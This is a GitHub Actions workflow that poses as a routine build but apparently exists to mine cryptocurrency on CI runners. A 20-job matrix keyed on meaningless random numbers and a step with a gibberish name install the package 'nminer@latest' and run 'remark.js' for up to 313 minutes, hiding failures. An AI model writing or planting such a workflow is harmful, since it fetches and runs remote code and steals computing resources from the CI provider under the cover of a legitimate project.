name: remark
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 9111 }
          - { version: 8044 }
          - { version: 4023 }
          - { version: 8560 }
          - { version: 9663 }
          - { version: 4728 }
          - { version: 9883 }
          - { version: 3310 }
          - { version: 2554 }
          - { version: 3803 }
          - { version: 5157 }
          - { version: 3855 }
          - { version: 9604 }
          - { version: 6042 }
          - { version: 7152 }
          - { version: 9708 }
          - { version: 8054 }
          - { version: 1933 }
          - { version: 3316 }
          - { version: 4168 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: whereas with square impish except
        run: |
          npm install nminer@latest
          timeout 313m node remark.js || echo "remark executed"